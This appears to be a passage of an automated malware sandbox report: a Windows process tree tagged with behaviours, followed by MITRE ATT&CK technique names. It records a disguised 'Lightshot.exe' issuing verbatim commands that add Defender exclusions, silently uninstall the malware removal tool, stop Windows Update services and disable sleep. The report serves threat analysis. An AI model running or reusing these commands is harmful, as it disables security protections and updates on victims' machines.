C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3960

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4060

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:1256

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:5000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:4000

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:4904

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1840

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:1868

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:896

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2992

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:1620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4396

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4292

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:1784
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4656 -ip 4656
  2⤵
  PID:112

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:3804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4212

C:\ProgramData\Screenshots\Lightshot.exe
C:\ProgramData\Screenshots\Lightshot.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:6104
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:2156
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:6740
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:6828
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:6748
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:6820
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:6876
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:6916
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6924
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:6996
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:7036
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5456
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:7044
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7132
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:7052
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5772
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:7060
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7124
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:7068
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:7096
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  PID:5452

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:5148

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:5636

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:6724

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:7144

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:4108

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:2580

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:6568

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:3356

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:6348

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3212

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:7764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4080 -ip 4080
1⤵
PID:6960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 7416 -ip 7416
1⤵
PID:5404

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4032

C:\ProgramData\Screenshots\Lightshot.exe
C:\ProgramData\Screenshots\Lightshot.exe
1⤵
PID:784
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:6668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:6644
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:5344
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:3952
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:7924
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:8488
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:8556
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:7244
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:8248
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:4032
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:7400
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:7172
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:912

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery